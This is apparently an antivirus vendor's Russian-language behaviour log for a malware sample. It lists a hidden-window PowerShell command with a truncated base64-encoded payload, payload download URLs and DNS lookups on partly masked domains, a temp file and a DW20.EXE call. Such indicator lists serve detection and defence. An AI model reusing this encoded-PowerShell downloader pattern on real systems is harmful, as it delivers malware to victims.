Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1596
- %TEMP%\1388783.cvr
- 'mi####alqasim.com':80
- 'wo####leetbd.com':80
- 'se####typoint.com':80
- http://mi####alqasim.com/oldSite/pXf0117/
- http://www.mi####alqasim.com/oldSite/pXf0117/
- http://www.wo####leetbd.com/websiteguide/pnGM26908/
- http://wo####leetbd.com/websiteguide/pnGM26908/
- http://se####typoint.com/news/eOjV/
- http://www.se####typoint.com/news/eOjV/
- DNS ASK cr###ectric.com
- DNS ASK mi####alqasim.com
- DNS ASK wo####leetbd.com
- DNS ASK se####typoint.com
- DNS ASK tr######rantydelivery.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABuAGEAdQByAG4AYQBpAHEAdQBoAGkAegA9ACcAdwB1AHUAcABxAHUAYQBlAGMAaAB0AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABjAHUAcgBgAGkAdAB5AGAAUABgAF...' (со скрытым окном)